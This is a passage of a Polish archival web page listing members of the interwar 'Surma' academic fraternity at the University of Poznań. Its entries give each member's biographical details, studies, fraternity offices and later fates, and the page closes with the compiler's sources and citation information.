Lekarz PRL, pochowany na cmentarzu przy ul. Wojska Polskiego w Sieradzu (sektor C1, rząd 3, grób 15) [Źródła (poza wskazanymi poniżej spisu członków): biogram Andrzeja Stępnia]
 60. Paweł Kirstein, (18 stycznia 1909 w Berlinie- ) absolwent klasycznego Gimnazjum w Starogardzie 1928, od 1928 student Wydziału Prawno-Ekonomicznego UP, c. 1929, akt. 1929-31
 61. Maksymilian Kluck, (29 listopada 1906 w Poznaniu - 1939-45) absolwent Gimnazjum Matematyczno-Przyrodniczego im. Bergera w Poznaniu 1925, od 1925 student Wydziału Prawno-Ekonomicznego UP, c. 1928, akt. 1928-31
 62. Władysław Kłosowski, (15 listopada 1897 w Bladowie pow. Tuchola - ) absolwent Gimnazjum w Chojnicach 1917, student Wydziału Prawno-Ekonomicznego UP 1923-28, c. 1923, akt. 1923-31, w 1931 inspektor ceł na Wolne Miasto Gdańsk
 63. Fryderyk Koebeke, c. ok. 1929, akt. 1929?-33
 64. Izydor Kołodziejczak, (2 kwietnia 1903 w Trzemesznie - ) absolwent klasycznego Gimnazjum w Trzemesznie 1922, ochotnik WP, od 1922 student i absolwent prawa UP, c. 1924, akt. 1924-31, prezes r.a. 1926/27
 65. Ludwik Roch Komczyński, (16 sierpnia 1909 w miejsc. Jaskółki pow. Odolanów - 1971) absolwent Gimnazjum im. św. Jana Kantego w Poznaniu 1929, student med. UP 1929-36, c. 1930, akt. 1930-35, sekretarz sem. let. 1930/31 (od maja), prezes r.a. 1932/33, olderman sem. zim. 1933/34, prezes Bratniej Pomocy Studentów UP 1934/35, dr med. 1946, anatom, patolog, prof., kierownik Zakładu Anatomii Patologicznej, rektor AM w Białymstoku
 66. Roman Konwiński, (?), student Wydziału Prawno-Ekonomicznego UP, prokandydat 1936
 67. Edmund Kosecki, sekretarz sem. let. 1938/39, prezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 68. Marian Ludwik Kowalski, (2 lutego 1911 w Lesznie - ) student i absolwent 1937 med. UP, c. ok. 1933, akt. 1933-37, wiceprezes r.a. 1935/36, prezes Koła Medycznego 1936/37, red. odp. “Życia Medycznego”, dr med., anatom, patolog, epidemiolog, w 1956 lekarz w Lesznie
 69. Zbigniew Kowalski, student Wydziału Rolno-Leśnego UP, c. 1936, akt. 1936-39, wiceprezes sem. let. 1937/38, skarbnik sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 70. Walerian Kozłowski, (9 grudnia 1906 w Inowrocławiu - ) absolwent Gimnazjum w Inowrocławiu 1925, od 1925 student Wydziału Prawno-Ekonomicznego UP, od 1927 student WSH, c. 1925, akt. 1925-31
 71. Feliks Krąkowski, (27 lipca 1907 w Inowrocławiu - 1977) absolwent Gimnazjum Marii Magdaleny w Poznaniu 1925, student i absolwent Wydziału Prawno-Ekonomicznego UP 1925-30, c. 1926, akt. 1926-31, sekretarz r.a. 1927/28 (od grudnia 1927), prezes sem. zim. 1928/29 i sem. let. 1929/30 (kadencja V-X 1930), olderman r.a. 1929/30, delegat na VIII Zjazd ZPKA, po studiach aplikant sądowy
 72. Feliks Krzywoszyński, (3 stycznia 1903 w Żninie - 1940) absolwent Gimnazjum w Inowrocławiu 1925, student med. UP, dr med., c. 1924, akt. 1924-31, olderman r.a. 1926/27 (od lutego 1927), V 1927, sem. zim. oraz sem. let. 1928/29
 73. Marian Krzyżaniak, (4 lutego 1911 w Starczanowie pow. Środa - ) absolwent klasycznego Gimnazjum w Gnieźnie 1928, od 1928/29 student Wydziału Prawno-Ekonomicznego UP, c. 1928, akt. 1928-32, skarbnik r.a. 1930/31, wiceprezes r.a. 1931/32
 74. Zdzisław Kurlus, c. 1921/22
 75. Antoni Kycler, założyciel Surmy
 76. Łucjan Lange, (15 październik 1900 w Prośnie pow. Chodzież - ) student med. UP, członek Akademickiego Towarzystwa “Surma”, założyciel Surmy, akt. 1920-31, dwukrotny zwycięzca zawodów Poznańskiego Koła Międzykorporacyjnego w szermierce, m.in. 1933, po wojnie asystent na UP
 77. Sławomir Laskowski, skarbnik sem. let. 1938/39
 78. Zbigniew Laskowski, pochodził z Mosiny, c. ok. 1933, akt. 1933?-37, prezes sem. let. 1936/37, lekarz red. nacz. “Życia Medycznego” 1935/36, po wojnie na emigracji w Stanach Zjednoczonych
 79. Władysław Lisiecki, c. ok. 1932
 80. Aleksander Łuczak, (17 marca 1909 - ) student Wydziału Humanistycznego UP, c. ok. 1926
 81. Stanisław Maciejewski, (17 września 1909 w Koźminie - ) absolwent klasycznego Gimnazjum w Lesznie 1928, od 1928 student Wydziału Humanistycznego UP, c. 1930, akt. 1930-31
 82. Seweryn Majcherkiewicz, student Wydziału Prawno-Ekonomicznego UP, c. 1935, akt. 1935-36
 83. Antoni Malenda, (3 stycznia 1906 w Gębicach pow. Mogilno - 1977/78) absolwent klasycznego Gimnazjum w Trzemesznie 1926, od 1926 student med. UP, c. 1928, akt. 1928-32, skarbnik r.a. 1929/30 oraz sem. let. 1929/30 (kadencja V-X 1930), prezes r.a. 1931/32, prezes Koła Trzemesznian 1929/30, członek Zarządu Bratniej Pomocy Studentów UP 1930/31
 84. Zygmunt Malenda, (23 kwietnia 1909 w Niechanowie pow. Gniezno - ) absolwent Gimnazjum w Wejherowie 1930, od 1930 student Wydziału Prawno-Ekonomicznego UP, c. 1931
 85. Franciszek Mały , założyciel Surmy, akt. 1921-22, pierwszy skarbnik sem. let. 1920/21, prezes sem. let. 1921/22, wiceprezes sem. let. 1921/22 (kadencja VI-X 1922)
 86. Tadeusz Mandowski, (4 listopada 1909 w Pleszewie - ) absolwent Gimnazjum im. Jana Kantego w Poznaniu 1929, od 1929 student med. UP, c. 1930, akt. 1930-31
 87. Marjan Martyński, (8 sierpnia 1908 w Świątkowie pow. Żnin - 24 czerwca 1986 w Wągrowcu) absolwent Gimnazjum w Trzemesznie 1929, od 1929 student med. UP, c. 1930, akt. 1930-31, członek Zarządu Akademickiego Koła Pałuczan 1932/33, lekarz, w 1945 brał udział w organizacji struktur administracyjnych i gospodarczych w Gorzowie Wielkopolskim, później pracował w Wągrowcu w Banku Spółdzielczym, którego do 1970 był dyrektorem
 88. Stefan Martyński, (31 lipca 1896 w Wągrowcu - 17 kwietnia 1945 w rejonie Dachau) s. Michała i Anny z d. Rączkowiak, uczestnik wojny polsko-bolszewickiej 1918-1921, od 1921 student prawa UP, założyciel Surmy, akt. 1921-22, olderman sem. zim. 1921/22, w 1933 referendarz, zatrzymany w łapance 18 lutego 1944, osadzony w Forcie VII, w maju 1944 osadzony w obozie koncentracyjnym Gross Rosen, a później w Dachau, zginął w czasie ewakuacji
 89. Czesław Matuszewski, założyciel Surmy, akt. 1921-23, skarbnik sem. let. 1922/23
 90. Kazimierz Matuszewski, c. 1921/22
 91. Stanisław Matuszewski, c. 1921/22
 92. Józef Matysiak, (5 stycznia 1908 - ) absolwent klasycznego Gimnazjum w Śremie 1927, od 1928 student Wydziału Prawno-Ekonomicznego UP, c. ok. 1929, akt. 1929?-31
 93. Roman Mazurkiewicz, założyciel i dyrygent Akademickiego Towarzystwa “Surma”, założyciel Surmy, akt. 1921-23, pierwszy prezes sem. let. 1920/21, prezes sem. let. 1921/22 (kadencja VI-X 1922), prezes sem. zim. 1922/23, wiceprezes sem. zim. 1921/22
 94. Czesław Melcer, c. 1921
 95. Henryk Mentkowski, c. ok. 1922
 96. Gabryel Michalski, (14 kwietnia 1911 w Mogilnie - ) absolwent Gimnazjum w Ostrzeszowie 1929, od 1929 student Wydziału Prawno-Ekonomicznego UP, c. 1930, akt. 1930-31
 97. Józef Michalski, (13 lutego 1908 w Kluczewie pow. Śmigiel - ) absolwent Gimnazjum Korneniusza w Lesznie 1926, od 1926 Wydziału Humanistycznego, a od 1927 Prawno-Ekonomicznego UP, c. 1928, akt. 1928-31

  Marian Mika, prawd. 1932 r.

 98. Marian Mika, (25 lutego 1907 w Kamionnej pow. Międzychód - 1974) absolwent Gimnazjum Marii Magdaleny w Poznaniu 1927, student Wydziału Humanistycznego UP 1927-31, c. 1928, akt. 1928-31, skarbnik sem. let. 1928/29 (od marca 1929), sekretarz r.a. 1929/30, wiceprezes sem. let. 1929/30 (kadencja V-X 1930), prezes r.a. 1930/31 (Prezydium X-lecia), przewodniczący komisji X-lecia Surmy, delegat na IX Zjazd ZPKA, kurator Gedanii Posnaniensis, prezes PKM 1931/32, członek Komisji Ideologiczno-Wychowawczej PKM 1932/33, wiceprezes Poznańskiego Komitetu Akademickiego 1932/33, po wojnie pracownik Archiwum Państwowego w Poznaniu, kustosz Muzeum Miejskiego w Poznaniu

 99. Alojzy Mrówczyński,
 100. Tadeusz Nadolny, (10 grudnia 1906 w Bydgoszczy - ) absolwent Gimnazjum w Trzemesznie 1927, student Wydziału Prawno-Ekonomicznego UP 1927-29, od 1929 student WSH, c. 1927, akt. 1927-31
 101. Florian Nadolski, (5 maja 1904 w Gnieźnie - ) absolwent Gimnazjum w Gnieźnie, od 1923 student i absolwent med. UP, dr med., c. 1924, akt. 1924-31, po wojnie na emigracji w Stanach Zjednoczonych
 102. Michał Napierała, (27 sierpnia 1901 w Dochanowie pow. Żnin - ) absolwent Gimnazjum we Inowrocławiu 1922, student i absolwent prawa UP 1922-26, c. 1922, akt. 1922-27, olderman sem. zim. (od lutego 1925) i sem. let. 1924/25, po studiach sędzia grodzki w Ostrowie Wlkp.
 103. Witold Neyman, (7 grudnia 1902 w Poznaniu - ) absolwent Gimnazjum Marii Magdaleny 1919, student i absolwent stomatologii PSD w Warszawie, c. 1926, akt. 1926-29, dr med. Stomatologii, internista
 104. Bernard Niczielniski,
 105. Marjan Niklewicz, (17 lipca 1907 w Ostrowie Wlkp. - ) absolwent Gimnazjum im. J. Paderewskiego w Poznaniu 1928, student Wydziału Matematyczno-Przyrodniczego 1928-30, a od 1930 Wydziału Farmaceutycznego UP, c. 1929, akt. 1929-31, farmaceuta
 106. Romuald Noryśkiewicz, student Wydziału Prawno-Ekonomicznego UP, c. 1936
 107. Zbigniew Noskowski,
 108. Edward Nowak, c. ok. 1934
 109. Jan Nowak, ( - lata 80-te) c. ok. 1933, wiceprezes r.a. 1934/35, prezes r.a. 1935/36, olderman sem. let. 1938/39, ostatni referent prasowy ZPKA 1938-39 (XVII kadencja), wiceprezes Koła Prawników i Ekonomistów 1935/36, mgr, sekretarz Koła Filistrów 1939
 110. Stanisław Nowakowski, (3 grudnia 1904 w Jarocinie - ) absolwent klasycznego Gimnazjum w Rogoźnie 1923, od 1923 student med. UP, student i absolwent WSH 1926-29, c. 1923, akt. 1923-31, skarbnik sem. zim. 1924/25, sekretarz r.a. 1925/26 oraz r.a. 1926/27 (do grudnia 1926), wiceprezes r.a. 1926/27 (od lutego 1927) i sem. zim. 1928/29, prezes V 1927 oraz r.a. 1927/28, delegat na V i VIII Zjazd ZPKA, kurator Quiritii
 111. Feliks Maria Nowowiejski (junior), (1911-1984) s. Feliksa (Surma)
 112. Wacław Ogłaza, (8 grudnia 1910 w Piaskach pow. Łask - ) absolwent Gimnazjum Humanistycznego w Łodzi 1930, od 1930 student Wydziału Prawno-Ekonomicznego UP, c. 1930, akt. 1930-31
 113. Jan Olejniczak, (1 lutego 1909 w Pleszewie - ) absolwent Państwowego Gimnazjum w Ostrzeszowie 1929, od 1929 student med. UP, c. 1930, akt. 1930-34, wiceprezes sem. zim. 1933/34, prezes sem. let. 1933/34 oraz r.a. 1934/35
 114. Roman Pallasch, (6 grudnia 1902 w Düsseldorfie - ) absolwent Gimnazjum w Chełmnie 1920, student i absolwent ekonomii UP, c. 1924, akt. 1924-28, sekretarz sem. let. 1924/25 (od kwietnia 1925), wiceprezes V 1927 oraz r.a. 1927/28, sekretarz Konwentu Filistrów 1929-31, pchor. rez.
 115. Henryk Pankowski, (12 stycznia 1907 w Żydowie pow. Gniezno - ) absolwent Gimnazjum Marii Magdaleny 1928, od 1929 student Wydziału Prawno-Ekonomicznego UP, c. 1930, akt. 1930-31, pchor. rez.
 116. Edward Paulus, student wychowania fizycznego UP, prokandydat 1936
 117. Tadeusz Piechowiak, c. ok. 1925, akt. 1925?-28, sekretarz r.a. 1927/28
 118. Józef Pietrzak, (13 marca 1907 w Karsewie pow. Gniezno - ) absolwent Gimnazjum w Gnieźnie 1927, od 1927 student Wydziału Humanistycznego UP, c. 1928, akt. 1928-31
 119. Czesław Piłowski, (1 czerwca 1910 w Krotoszynie - ) absolwent Gimnazjum Matematyczno-Przyrodniczego UP 1928, od 1929 student Wydziału Matematyczno-Przyrodniczego UP, c. 1930, akt. 1930-31, prezes Akademickiego Koła Krotoszyniaków 1932/33, członek Zarządu Zrzeszeń Akademickich Kół Regionalnych 1932
 120. Konrad Piosik, (18 kwietnia 1910 w Berlinie - ) absolwent Gimnazjum w Świeciu nad Wisłą 1929, od 1929 student Wydziału Prawno-Ekonomicznego UP, c. 1930, akt. 1930-31
 121. Roman Piosik, student Wydziału Matematyczno-Przyrodniczego UP, c. 1935, akt. 1935-36
 122. Zdzisław Porzwniski, sekretarz sem. let. 1937/38
 123. Witold Marian Powel, (9 kwietnia 1910 w Poznaniu - ) absolwent Państwowego Gimnazjum Humanistycznego w Ostrzeszowie 1930, od 1930 student Wydziału Humanistycznego UP, c. 1931, absolwent stomatologii AM w Poznaniu 1950

  Eligiusz Preisler.

 124. Eligiusz Preisler, (1 grudnia 1908 w Jarocinie - 24 lutego 2008 w Poznaniu) absolwent Gimnazjum w Wolsztynie, student med. UP 1927-34, w czasie okupacji szef Służby Zdrowia AK w pow. garwolińskim, c. 1929, akt. 1929-31, po wojnie asystent w Katedrze Higieny Szkolnej i Teorii Wychowania Fizycznego przy Studium Wychowania Fizycznego Wydziału Lekarskiego UP, prof. AM w Poznaniu, organizator i pierwszy kierownik pierwszej w Polsce Katedry Medycyny AM w Poznaniu 1958, od 1962 ordynator Oddziału Chorób Wewnętrznych Szpitala im. Franciszka Raszei, pochowany na Cmentarzu na Miłostowie w Poznaniu

 125. Stanisław Przybylski, (28 kwietnia 1905 w Chabsku pow. Mogilno - ) od 1924 student i absolwent prawa UP, c. 1927, akt. 1927-31, wiceprezes sem. zim. 1928/29 (od stycznia 1929)
 126. Czesław Przymusiński, (1909 - 1983) prawnik
 127. Mieczysław Putz, (3 maja 1905 w Powidzu pow. Gniezno - 1977) absolwent Gimnazjum w Trzemesznie 1925, od 1925 student Wydziału Prawno-Ekonomicznego UP, c. 1925, akt. 1925-31, wiceprezes r.a. 1929/30, członek Komisji Ideologiczno-Wychowawczej PKM 1932/33, po wojnie adwokat w Oleśnicy, działacz SD w Oleśnicy (uzupełnienie biogramu o dane z nekrologu Tomasz Otocki)
 128. Kazimierz Rakowski-Lubicz, (9 sierpnia 1902 we Wrocławiu - ) absolwent Gimnazjum w Lesznie 1921, od 1921 student Wydziału Prawno-Ekonomicznego UP, Seminarium Duchowne 1924-29, c. ok. 1922, akt. 1922?-31
 129. Kazimierz Rankowski, (4 marca 1900 w miejsc. Komorze nad Prosną - 22 stycznia 1968) s. Felicjana (rektor szkoły powszechnej) i Kazimiery z d. Kratka, uczeń gimnazjum w Krotoszynie, prezes Towarzystwa Tomasza Zana, matura 1918, walczył w powstaniu wielkopolskim na odcinkach Jarocin-Krotoszyn-Zduny, ochotnik w wojnie polsko-rosyjskiej 1920, zaangażowany w organizację plebiscytu na Warmii, student i absolwent prawa UP 1919-23, założyciel Surmy 1921, wystąpił i przeszedł do Chrobrii, prezes 1923 i 1925, olderman 1924/25, egzamin sędziowski 1925, sędzia powiatowy w Zbąszyniu, od 1929 adwokat i notariusz w Czarnkowie, odznaczony Srebrnym Krzyżem Zasługi, w czasie wojny trafił do niewoli sowieckiej, więzień łagrów, dołączył do II Korpusu PSZ, gdzie służył w wojskowym sądownictwie, po wojnie i demobilizacji postał na emigracji w Wielkiej Brytanii, pracował jako robotnik fabryczny, a następnie księgowy, w 1955 wrócił do Polski, adwokat w Poznaniu, pochowany na cmentarzu Junikowskim w Poznaniu
 130. Konstanty Stanisław Ryński, (23 listopada 1899 w Chomiąży pow. Żnin - ) absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu 1921, ochotnik WP 1918-20, student Wydziału Prawno-Ekonomicznego UP 1921-25, c. 1921, akt. 1921-28, sekretarz sem. let. 1922/23, por. rez.
 131. Seweryn Rzepczyński, student Wydziału Prawno-Ekonomicznego UP, c. 1933, akt. 1933-36
 132. Antonin Sawiński, (17 maja 1899 w Inowrocławiu - 1976) absolwent Gimnazjum w Inowrocławiu 1919, od 1919 student Wydziału Prawno-Ekonomicznego UP, założyciel i prezes Akademickiego Towarzystwa “Surma” 1920, akt. 1920-25, pierwszy wiceprezes sem. let. 1920/21, prezes sem. zim. 1921/22, sekretarz Konwentu Filistrów 1926-29, wiceprezes Koła Filistrów 1939, ppor. rez. art.
 133. Feliks Siebers, (23 sierpnia 1904 w Iwnie pow. Szubin - ) absolwent Gimnazjum w Nakle 1923, student Wydziału Prawno-Ekonomicznego UP 1923-27, od 1927 alumn Seminarium Duchownego, święcenia 1932, c. 1924, akt. 1924-32
 134. Edward Siegmüller, (25 października 1900 w Zelgoszczy na Pomorzu - ) absolwent Państwowego Gimnazjum w Bydgoszczy, ochotnik WP 1920, student i absolwent (mag. rerum polit.) Wydziału Prawno-Ekonomicznego UP 1921-28, c. 1923, akt. 1923-29, po studiach urzędnik Banku Polskiego
 135. Stanisław Sławski, (29 marca 1907 w Wielichowie pow. Śmigiel - ) absolwent humanistycznego Gimnazjum w Gnieźnie 1927, od 1927 student Wydziału Humanistycznego UP, c. 1928, akt. 1928-31
 136. Ignacy Sobczak, c. ok. 1924
 137. Bogdan Stęczniewski, skarbnik sem. let. 1937/38, wiceprezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 138. Gwidon Stęczniewski, (4 września 1914 w Strzelnie - ) student i absolwent 1947 farmacji UP, c. 1934, akt. 1934-39, prezes sem. let. 1937/38, sekretarz PKM 1938, sekretarz generalny ZPKA 1938 (XVI kadencja), w 1956 farmaceuta w Strzelnie

  Stefan Stroiński, 1924 r.

 139. Stefan Stroiński, (10 września 1902 w Pakości pow. Inowrocław - 18 lipca 1967) s. Ludwika i Stanisławy z d. Wojciechowskiej, absolwent Państwowego Gimnazjum w Poznaniu (Inowrocławiu ?) 1921, w 1920 służył w służbie łączności WP w Poznaniu, student i absolwent prawa UP 1921-24, c. 1921, akt. 1921-25, sekretarz sem. zim. 1922/23, od 1929 sędzia grodzki w Kępnie, od 1930 naczelnik Sądu Grodzkiego w Ostrzeszowie, od 1932 adwokat w Ostrowie Wlkp., ppor. rez., w wojnie obronnej 1939 sędzia polowy w 25 Dywizji Piechoty, w niewoli niemieckiej w obozach jenieckich Prenzlau, Neubrandenburg, Gross-Born i Sandbostel, po wojnie w 1946 członek Polskiej Misji Wojskowej Badania Zbrodni Niemieckich w Niemczech, po powrocie do kraju pracował jako adwokat, kierownik Zespołu Adwokackiego w Ostrowie Wlkp., inwigilowany przez UB/SB

 140. Zdzisław Sulecki, c. ok. 1932
 141. Artur Stybbe, c. ok. 1932, skreślony 1933

  Stanisław Szamborski, 1923/24 r. (?).

 142. Stanisław Szamborski, (7 kwietnia 1901 w Jarocinie - 1966) ze Lwówka, absolwent Gimnazjum im. K. Marcinkowskiego 1921, powstaniec wielkopolski, ochotnik WP 1919-20, student i absolwent med. UP 1921-28, c. 1921, akt. 1921-28, wiceprezes r.a. 1925/26, w 1956 lekarz w Bydgoszczy

 143. Marian Szmytkiewicz, (7 kwietnia 1912 w Pakości - ) brat Stanisława (Surma), absolwent Gimnazjum im. J. Kasprowicza w Inowrocławiu 1930, od 1930 student i absolwent 1934 farmacji UP, c. 1931, w 1956 farmaceuta w Gorzowie Wlkp.
 144. Stanisław Alojzy Szmytkiewicz, (6 lutego 1911 w Pakości - ) brat Mariana (Surma), absolwent Gimnazjum w Inowrocławiu 1928, student i absolwent med. UP 1928-35, c. 1928, akt. 1928-31, wiceprezes sem. let. 1933/34, w 1956 lekarz w Płocku
 145. Roman Szudziński, (14 stycznia 1906 w Wągrowcu - ) absolwent miejskiego Gimnazjum w Rogoźnie 1926, od 1926 student med. UP, c. 1927
 146. Józef Szulczyński, (8 lutego 1906 w Łężeczkach pow. Międzychód - ) absolwent Gimnazjum w Koźminie 1928, student Wydziału Prawno-Ekonomicznego 1928-30, od 1930 student Wydziału Humanistycznego UP, c. 1928, akt. 1928-31
 147. Romuald Szymaniuk, (2 lutego 1902 w Srebrnej pow. Ostrów - ) od 1921 student, absolwent leśnictwa UP, członek Akademickiego Towarzystwa “Surma”, c. 1921 (pierwszy fuks), akt. 1921-24, po studiach komisarz ochrony lasów
 148. Czesław Śleszyński, (3 czerwca 1907 w Grodzisku Mazowieckim - ) absolwent Gimnazjum w Grodzisku Mazowieckim 1929, od 1930 student med. UP, c. 1931, akt. 1931-34, sekretarz sem. zim. 1933/34
 149. Zbigniew Śmielecki, (3 stycznia 1907 w Gnieźnie - 1980) absolwent Państwowego Gimnazjum w Gnieźnie 1925, od 1925 student Wydziału Prawno-Ekonomicznego UP, od 1928 student WSH, c. 1926, akt. 1926-31, olderman r.a. 1930/31, wiceprezes Akademickiego Koła Gnieźnian, pchor. rez. art.
 150. Bronisław Śmieśniewicz (Śmiśniewicza), wiceprezes Koła Filistrów 1924-28, olderman r.a. 1929/30 (od listopada 1929)
 151. Edmund Śmigowski, sekretarz sem. zim. 1939/40 (ostatnie Prezydium przed wojną)

  Tadeusz Taterczyński, 1934 r.

 152. Tadeusz Taterczyński, (5 marca 1904 w Berlinie - wiosną 1967) absolwent Gimnazjum w Jarocinie 1923, od 1927 student Wydziału Prawno-Ekonomicznego UP, od 1927 student WSH, c. 1923, akt. 1923-31, prezes sem. let. i sem. zim. 1928/29 i r.a. 1929/30, skarbnik PKM 1928/30, delegat na VIII Zjazd ZPKA, przewodniczący Komisji Rewizyjnej Koła Naukowego WSH 1927, sekretarz Koła Filistrów 1931-36, pochowany w grobie rodzinnym na Junikowie w Poznaniu

 153. Stefan Trando, c. ok. 1932, akt. 1932?-38, sekretarz r.a. 1934/35 oraz sekretarz sem. let. 1936/37, skarbnik r.a. 1935/36

  Stanisław Turski, ok. 1924 r.

 154. Stanisław Turski, (6 maja 1902 w miejsc. Smogulec pow. Wągrowiec - 13 lipca 1968 w miejsc. Koniuszy pow. Proszowice) s. Ignacego Zygmunta i Anny z d. Goeppner, powstaniec wielkopolski, absolwent Gimnazjum w Nakle 1923, student Wydziału Humanistycznego UP 1923-28, c. 1924, akt. 1924-31, sekretarz sem. zim. 1924/25, olderman r.a. 1927/28 (od stycznia 1928), wiceprezes sem. zim. i sem. let. 1928/29

 155. Zbigniew Walter, założyciel Surmy, akt. 1921-23, wiceprezes sem. zim. 1922/23
 156. Adam Wargoś, c. ok. 1932
 157. Maksymilian Weber, (11 października 1903 w Ryczywole - ) absolwent Gimnazjum w Rogoźnie 1922, ochotnik WP, od 1922 student Wydziału Prawno-Ekonomicznego UP, c. 1922, skarbnik Koła Filistrów 1931-36, działacz polityczny, członek władz okręgowych SN 1937, pchor. rez.
 158. Marjan Werwiński, (24 sierpnia 1905 w Śremie - ) absolwent Gimnazjum w Śremie, 1926, od 1927 student Wydziału Prawno-Ekonomicznego UP, c. 1927, akt. 1927-31
 159. Stanisław Wesołowski, (6 listopada 1909 w Poznaniu - ) absolwent Gimnazjum Marii Magdaleny w Poznaniu 1928, od 1929 student ekonomii UP, c. 1930, akt. 1930-31, pchor. rez. piechoty
 160. Konstanty Wiecki, (6 grudnia 1906 w Trzcińsku pow. Starogard - ) absolwent Gimnazjum w Starogardzie 1927, od 1927 student Wydziału Prawno-Ekonomicznego UP, c. 1929, akt. 1929-31
 161. Leonard Wieczorkiewicz, c. ok. 1924
 162. Mieczysław Wieczorkiewicz, (1905 - )
 163. Kazimierz Wieruszewski, (13 sierpnia 1909 w Gnieźnie - 1994) absolwent klasycznego Gimnazjum w Gnieźnie 1930, od 1930 student prawa UP, c. 1931
 164. Władysław Wilinkiewicz, student Wydziału Humanistycznego UP, c. 1936
 165. Edmund Wiśniewski, c. ok. 1928
 166. Alfred Włoch, c. 1931, akt. 1931-33, olderman r.a. 1932/33, członek Koła Prawników i Ekonomistów 1933, prezes Akademickiego Koła Krotoszyniaków 1933/34
 167. Florian Wnuk, (1895 - 10 marca 1924) członek Akademickiego Towarzystwa “Surma”, założyciel Surmy, pochowany w Inowrocławiu
 168. Kazimierz Wojciechowski, członek i sekretarz Akademickiego Towarzystwa “Surma”, założyciel Surmy, akt. 1921-22, sekretarz sem. zim. 1921/22
 169. Tadeusz Wojciechowski, c. 1921
 170. Jan Wyduba, (22 listopada 1905 w Potaszycy pow. Jarocin - ) absolwent Gimnazjum Humanistycznego im. J. Kantego w Poznaniu 1925, student Wydziału Humanistycznego 1925-27, a od 1927 Wydziału Prawno-Ekonomicznego UP, c. 1928, akt. 1928-31
 171. Bronisław Zakrzewski, (26 kwietnia 1908 w Przybinii pow. Leszno - ) absolwent Gimnazjum Komeniusza w Lesznie 1928, od 1929 student Wydziału Rolno-Leśnego UP, c. 1930, akt. 1930-31, pchor. rez. art.
 172. Franciszek Zakrzewski, (19 listopada 1900 w Gnieźnie - ) absolwent Gimnazjum Klasycznego w Gnieźnie, student i absolwent prawa UP, założyciel Surmy, akt. 1921-24, skarbnik sem. let. 1921/22, sędzia, w 1931 naczelnik sądu w Mogilnie
 173. Tadeusz Teodor Zbychorski, (26 października 1901 - 14 stycznia 1979) c. ok. 1922, lekarz laryngolog w Poznaniu
 174. Feliks Józef Zelba, (17 lutego 1911 w Śremie - 1940 w Katyniu) s. Ignacego, absolwent Gimnazjum w Śremie 1928, od 1928 student i absolwent med. UP, ppor. rez., w wojnie obronnej 1939 w 7 Szpitalu Okręgowym, w niewoli sowieckiej, zamordowany przez NKWD
 175. Mieczysław Zieliński, c. 1921/22, akt. 1921/22-25, sekretarz sem. zim. (od lutego 1925) oraz sem. let. 1924/25
 176. Florjan Ziemski, (27 kwietnia 1908 w Poznaniu - ) absolwent Gimnazjum im. św. Jana Kantego 1929, od 1929 student med. UP, c. 1930, akt. 1930-31
 177. Jan Ziółkowski, (18 sierpnia 1903 w Janowcu pow. Wągrowiec - ) absolwent klasycznego Gimnazjum w Gnieźnie 1924, od 1924 student Wydziału Humanistycznego UP, od 1928 student Seminarium Duchownego, c. 1925, akt. 1925-31
 178. Władysław Zwierzycki, c. ok. 1922
 179. Antoni Żychski, c. ok. 1924, akt. 1924?-26
 180. Bronisław Żychski, (1901 - 1943 w Auschwitz) c. ok. 1924

Pieczęć Surmy, 1931 r.

Listę członków opracowano na podstawie:

1) Marian Mika (red.), “Surma” Korporacja Akademicka przy Uniwersytecie Poznańskim 1921 - 14.IV. - 1931, Poznań 1931 (Księga X-lecia),
2) Korporacja Studentów Uniwersytetu Poznańskiego Surma. XV. 1921-1936, Poznań 1936,
3) K. A. Tyszka, Lista członków Polskiej Korporacji Akademickiej Surma (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 60 i n.,
4) materiałów archiwalnych z Archiwum UAM,
5) materiałów archiwalnych z Archiwum Korporacyjnego,
6) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Surma.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnie zmiany: 16 IV 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Akademicka “Surma” przy Uniwersytecie Poznańskim, (na:) www.archiwumkorporacyjne.pl, stan 16 IV 2022 r.

Surma, prawd. 1922-26 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }